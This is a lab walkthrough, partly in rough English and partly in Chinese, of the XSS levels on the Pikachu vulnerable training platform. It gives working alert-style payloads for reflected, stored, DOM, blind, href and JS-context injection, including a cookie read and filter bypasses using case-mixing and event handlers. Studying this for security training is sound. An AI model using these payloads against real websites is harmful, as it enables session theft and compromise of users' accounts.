Pikachu-XSS (cross site scripting)

XSS (cross site scripting) Overview

Cross-Site Scripting referred to as "CSS" , in order to avoid the front folded and abbreviations style sheet "CSS" conflict, it is also known as XSS . Usually XSS can be divided into the following several common types:
    1. reflective XSS;
    2. storage type XSS;
    3.DOM type XSS;

XSS vulnerability has been assessed as web vulnerability harmful loopholes in the OWASP TOP10 ranking has always belonged status to the first three.
XSS is a place in the front-end browser vulnerabilities, so the object is the harm of front-end user.
Forming XSS main reason is the vulnerability of the program input and output do not have appropriate treatment, leading to " carefully constructed " character output when the front end is used as the browser parses the effective implementation of the code in order to cause harm.
So XSS on guard against vulnerabilities, usually using " input filter " and " output escaped " way of processing :
  input filter: input filter, may lead to not allow XSS character input attacks ;
  output escaping : properly escaped to the front end of content output according to the position of the output point ;

 

---

 

Reflective XSS ( GET )

1. to enter a test to see what it returns, just enter other characters, do not filter found

 

 

 

 

2. Check page elements audit found that the length of the input box is only 20 , modified to 40

 

 

 

 

3. Try xss use, <Script> Alert ( 'xss') </ Script>

 

 

 

 

---

 

Reflective XSS ( POST )

1. by prompting first log into

 

 

 

 

2. View Lander's cookie information, <Script> Alert (document.cookie) </ Script>

 

 

 

 

---

 

Storage type xss

1. attempt to insert in the message board xss codes, no filtration, <Script> Alert ( 'xss') </ Script>

 

 

 

 

---

 

DOM type xss

1. Check the review elements need to construct what is called domxss () function

 

 

 

 

 

 

 

2. Try xss use, 'the onclick = "Alert (' xss')">

 

 

 

 

3.也可以，'><img src="#" onmouseover="alert('xss')">

 

 

 

 

---

 

DOM型xss-x

1.和DOM型xss一样， ' onclick="alert('xss')">

 

 

 

 

2.也可，'><img src=1 onerror="alert('xss')">

 

 

 

 

---

 

xss之盲打

1.输入提交，<script>alert('xss')</script>

 

 

 

 

2.登录后台查看

 

 

 

 

---

 

xss之过滤

1.尝试，<script>alert('xss')</script>

 

 

 

 

2.发现被过滤，换个语句尝试，<img src=1 onerror="alert('xss')">

 

 

 

 

3.通过大小写也可绕过过滤，<sCript>alert('xss')</sCript>

 

 

 

 

---

 

xss之htmlspecialchars

1.尝试构造，'><img src=1 onerror="alert('xss')">

 

 

 

 

2.htmlspecialchars函数的作用:该函数把预定义的字符转换为 HTML 实体预定义的字符是 & " ' < > 这五个，即转化为 &#xxx的形式。默认情况下为只过滤双引号，若设置为ENT_QUOTES则单双引号均被过滤。输入'1'查看

 

 

 

 

未过滤单引号'，<a href="" 1''="">'1'</a>，输入的单引号没有被过滤的话，经过htmlspecialchars后拼接到html语句中会自动换成双引号

 

3.构造，' onclick='alert(/xss/)'

 

 

 

 

---

 

xss之href输入

1.尝试，' onclick='alert(/xss/)'

 

 

 

2.审查返回的元素发现所有字符都被转化为HTML实体了，包括单引号。
但由于输入的url拼接在 <a href='输入的内容'>属性中，可以使用javascript语法来构造语句：javascript:alert('xss')

 

 

 

---

 

xss之js输出

1.尝试，javascript:alert('xss')

 

 

 

2.构造，';alert(/xss/)//

 

 

 

---